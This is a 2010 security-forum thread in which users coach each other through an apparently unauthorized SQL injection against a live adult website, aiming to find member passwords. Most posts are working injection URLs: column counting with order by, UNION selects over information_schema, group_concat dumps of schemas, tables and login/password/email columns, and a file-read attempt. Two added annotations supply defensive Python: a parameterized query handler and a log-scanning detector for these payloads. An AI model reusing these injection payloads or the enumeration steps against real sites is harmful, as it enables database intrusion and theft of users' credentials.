IT Security and Insecurity Portal |
Can't display columns in tables |
Posted: Wed Oct 06, 2010 9:17 am |
RubberDoll |
Active user |
Joined: Jun 04, 2009 |
Posts: 46 |
Hello again
I started an injection on a site.
First thing is the basic test didn't expose the number of columns, only displayed 2 error messages and 1 missing image
Code: | http://site.com/show.php?type=model&id=82+order+by+20-- |
Quote: | warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/path/to.site.com/htdocs/show.php on line 6
|
However,
Code: | http://site.com/show.php?type=model&id=82+order+by+1-- |
did not give any errors, so I just increased the numbers, and found it was 6 columns without errors
I found the vulnerable column by trial and error, and was able to find database user, the database name and mysql version 5.0.51B-LOG
Code: | http://site.com/show.php?type=model&id=-82+union+all+select+1,concat(table_name,char(58),column_name),3,4,5,6+from+information_schema.columns--
|
Quote: | CHARACTER_SETS:CHARACTER_SET_NAME |
I used group_concat and found in the page source the list, but not completed
so I decided to first get all table names only, and found checking the source page again, a table name which I believe to be my goal
but now, whatever I do to display the columns from that table, I get the first error ( with the path ).
in fact, I couldn't view any other table's columns besides information_schema.columns, but that is not a complete list, so I don't see the columns in the table I'm interested in..
I don't have permission to read files as well, I tried loading /etc/passwd with no result . It deforms the page but nothing in the source..
My questions
How to make the injection show all the rest of the tables/columns in information_schema.columns ?
or maybe a trick to see the columns from the table I am after?
well, I'd love to know both ways :)
Thank you. |
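The behaviour described in the post above (one numeric `id` giving a clean page for some `order by` values and a driver warning for others) comes from input concatenated into the SQL text with errors echoed to the client. The following is an added example, not code from the thread or the site: SQLite stands in for MySQL so it runs offline, and the table and function names are hypothetical.

```python
import re
import sqlite3

def make_db():
    # Constructed six-column table; SQLite stands in for MySQL so this runs offline.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE models (id INTEGER PRIMARY KEY, name, c3, c4, c5, c6)")
    db.execute("INSERT INTO models VALUES (82, 'sample', 3, 4, 5, 6)")
    return db

def show_vulnerable(db, raw_id):
    """The pattern behind the thread's behaviour: input concatenated into SQL,
    driver errors echoed to the client."""
    try:
        return 200, db.execute("SELECT * FROM models WHERE id=" + raw_id).fetchall()
    except sqlite3.Error as exc:
        return 500, "warning: " + str(exc)  # error text becomes a yes/no oracle

def show_hardened(db, raw_id):
    """Allow-list the id, bind it as a parameter, keep error detail server-side."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return 400, "bad request"  # same answer for every malformed id
    try:
        return 200, db.execute("SELECT * FROM models WHERE id=?", (int(raw_id),)).fetchall()
    except sqlite3.Error:
        return 500, "internal error"  # log the exception; never render it

def compare(raw_id):
    """Status codes of (vulnerable, hardened) handlers for the same input."""
    db = make_db()
    return show_vulnerable(db, raw_id)[0], show_hardened(db, raw_id)[0]
```

In the hardened handler every malformed `id` gets the same response, so the difference between a valid and an invalid column index is no longer visible. On a PHP site the matching settings are `display_errors = Off` with `log_errors = On`, which also stops the path disclosure seen in the warning.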
Posted: Tue Oct 12, 2010 10:36 am |
RubberDoll |
Active user |
Joined: Jun 04, 2009 |
Posts: 46 |
solved
it only took me a week
but here is the next problem in the same site:
after I've checked the table I wanted, it turned out not to be the members' table, and in fact I didn't find any table with members' passes or any other info
the information I got since my first try on this site is
user: MEMBERSxxxx@LOCALHOST
database: MEMBERSxxxx
now, I can't wrap my mind around this concept..
shouldn't I be able to see the tables in this database like so:
show.php?type=model&id=-82+union+all+select+1,(table_name),3,4,5,6+from+membersxxxx--
and another question, please.
could I, and how, see a list of available databases for this site?
please : )
Thank you |
Posted: Tue Oct 12, 2010 5:40 pm |
pink_spider |
Advanced user |
Joined: Aug 28, 2010 |
Posts: 91 |
Hi (:
everything good?
I think you should first try to attack the 'schemata'
the 'information_schema' and then proceed with the attack until the end!
Code: | http://site.com/show.php?type=model&id-82+union+(select+1,Group_concat(Concat_Ws(0x5c,schema_name)),3,4,5,6+from+information_schema. schemata-- |
I hope I have helped you!
Contact: Pink_spider79@hotmail.com |
Posted: Wed Oct 13, 2010 8:54 am |
RubberDoll |
Active user |
Joined: Jun 04, 2009 |
Posts: 46 |
Thank you pink_spider
unfortunately not. just an error with path disclosure
what does this string mean anyway? (I mean, what info I was supposed to get)
Thanks again
p.s.
you also missed a closing parenthesis I think
Code: | (select+1,group_concat(concat_ws(0x5c,schema_name))) |
but sadly, that didn't work either..
pink_spider wrote: | Hi (:
everything good?
I think you should first try to attack the 'schemata'
the 'information_schema' and then proceed with the attack until the end!
Code: | http://site.com/show.php?type=model&id-82+union+(select+1,Group_concat(Concat_Ws(0x5c,schema_name)),3,4,5,6+from+information_schema. schemata-- |
I hope I have helped you!
Contact: Pink_spider79@hotmail.com |
Posted: Wed Oct 13, 2010 9:40 am |
RubberDoll |
Active user |
Joined: Jun 04, 2009 |
Posts: 46 |
ok.. I figured it out. looked up 'schemata' in google.
alas, no good news for me. no users with plaintext passes table |
Posted: Wed Oct 13, 2010 6:10 pm |
pink_spider |
Advanced user |
Joined: Aug 28, 2010 |
Posts: 91 |
Oh sorry ):
sure the code would be:
Code: |
http://site.com/show.php?type=model&id-82 union (select 1,GROUP_CONCAT(CONCAT_WS(0x5c,schema_name)),3,4,5,6 from information_schema.schemata)-- |
or
Code: |
http://site.com/show.php?type=model&id-82 union (select 1,GROUP_CONCAT(CONCAT_WS(0x5c,schema_name)),3,4,5,6) from information_schema.schemata-- |
You can use the 'schemata' to know the names of 'db'
instance: db_name: waraxe.us
You go and explore this table to get the logins and passwords
users of the forum.
Code: |
http://waraxe.us/sql.php?id=-1 and (Select 1,group_concat(CONCAT_WS(0x5c,login,password,email)),3,4,5,6 from waraxe.us.users-- |
this is not what matters most ):
try this code! and then post it here if it worked. \ Õ /
Code: | http://site.com/show.php?type=model&id=-82+union+(select+1,GROUP_CONCAT(table_name),3,4,5,6)+From+INFORMATION_SCHEMA.TABLES+where+table_schema=database()-- |
I have helped this time (y)
Posted: Thu Oct 14, 2010 9:05 am |
RubberDoll |
Active user |
Joined: Jun 04, 2009 |
Posts: 46 |
Hello again, pink_spider
What makes you think it's a forum? it's not. it's just an adult site ;)
Thank you for trying to further help, but I already solved the matter yesterday, and was able to find out which databases exist on that site.
However your help didn't go in vain because I found out about schemata. so thanks again :)
oh and I tried because you wanted to know about the last code you posted
no. nothing found.
pink_spider wrote: | Oh sorry ):
sure the code would be:
Code: |
http://site.com/show.php?type=model&id-82 union (select 1,GROUP_CONCAT(CONCAT_WS(0x5c,schema_name)),3,4,5,6 from information_schema.schemata)-- |
or
Code: |
http://site.com/show.php?type=model&id-82 union (select 1,GROUP_CONCAT(CONCAT_WS(0x5c,schema_name)),3,4,5,6) from information_schema.schemata-- |
You can use the 'schemata' to know the names of 'db'
instance: db_name: waraxe.us
You go and explore this table to get the logins and passwords
users of the forum.
Code: |
http://waraxe.us/sql.php?id=-1 and (Select 1,group_concat(CONCAT_WS(0x5c,login,password,email)),3,4,5,6 from waraxe.us.users-- |
this is not what matters most ):
try this code! and then post it here if it worked. \ Õ /
Code: | http://site.com/show.php?type=model&id=-82+union+(select+1,GROUP_CONCAT(table_name),3,4,5,6)+From+INFORMATION_SCHEMA.TABLES+where+table_schema=database()-- |
I have helped this time (y)
:oops: |
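The requests quoted throughout this thread share a small set of shapes (`order by N`, `union ... select`, reads from `information_schema`, `group_concat`, a trailing `--`) that stand out in a web server access log. The following is an added example, not part of the thread: a log scanner over constructed Combined Log Format lines, with hypothetical rule names and documentation-range client addresses.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Heuristic rules for the request shapes quoted in this thread.
RULES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\b(\s+all)?\s*\(?\s*select\b", re.I),
    "schema_enum": re.compile(
        r"\binformation_schema\s*\.\s*(columns|tables|schemata)\b", re.I),
    "aggregate_dump": re.compile(r"\bgroup_concat\s*\(", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "trailing_comment": re.compile(r"(--|#)\s*$"),
}
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3}')

# Constructed access-log lines (documentation IP ranges, hypothetical host).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Oct/2010:09:10:01 +0000] '
    '"GET /show.php?type=model&id=82 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [06/Oct/2010:09:10:09 +0000] '
    '"GET /show.php?type=model&id=82+order+by+20-- HTTP/1.1" 200 812',
    '203.0.113.7 - - [06/Oct/2010:09:14:30 +0000] '
    '"GET /show.php?type=model&id=-82+union+all+select+1,concat(table_name,char(58),'
    'column_name),3,4,5,6+from+information_schema.columns-- HTTP/1.1" 200 5300',
    '198.51.100.4 - - [12/Oct/2010:17:41:02 +0000] '
    '"GET /show.php?type=model&id-82+union+(select+1,group_concat(schema_name),'
    '3,4,5,6+from+information_schema.schemata)-- HTTP/1.1" 200 812',
]

def classify(text):
    """Names of all rules matching one decoded parameter."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(lines):
    """Return (client, parameter, rule names) for each suspicious parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            # "id-82+union+..." has no "=", so the payload arrives as a bare key.
            hits = classify(value or key)
            if hits:
                findings.append((client, key if value else "<bare>", hits))
    return findings
```

`scan(SAMPLE_LOG)` flags the last three lines and leaves the plain `id=82` request alone. The rules are heuristics for triage, so a single hit such as `trailing_comment` is weak on its own, while several rules firing on one numeric parameter is a strong signal.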
www.waraxe.us Forum Index -> Sql injection
All times are GMT